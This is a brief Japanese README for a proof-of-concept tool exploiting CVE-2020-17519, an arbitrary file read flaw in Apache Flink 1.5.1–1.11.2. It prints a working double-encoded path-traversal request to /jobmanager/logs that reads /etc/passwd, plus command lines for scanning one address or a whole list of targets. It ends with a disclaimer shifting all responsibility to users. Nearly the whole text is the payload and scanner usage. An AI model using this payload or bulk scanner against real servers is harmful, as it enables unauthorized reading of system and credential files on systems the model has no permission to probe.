
CVE-2020-17519; Apache Flink 任意ファイル読み取り; 一括検出
Apache Flink 1.5.1 ~ 1.11.2
POC
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
python3 CVE-2020-17519 --help 使用ヘルプを表示
python3 CVE-2020-17519 -u http://127.0.0.1:8080 特定のアドレスに脆弱性が存在するかどうかを検出
python3 CVE-2020-17519 -f target.txt 脆弱性を一括検出
本記事で提供される情報の伝播・利用によって生じる直接的または間接的な結果および損害については、すべて利用者本人が責任を負うものとし、著者は一切の責任を負いません。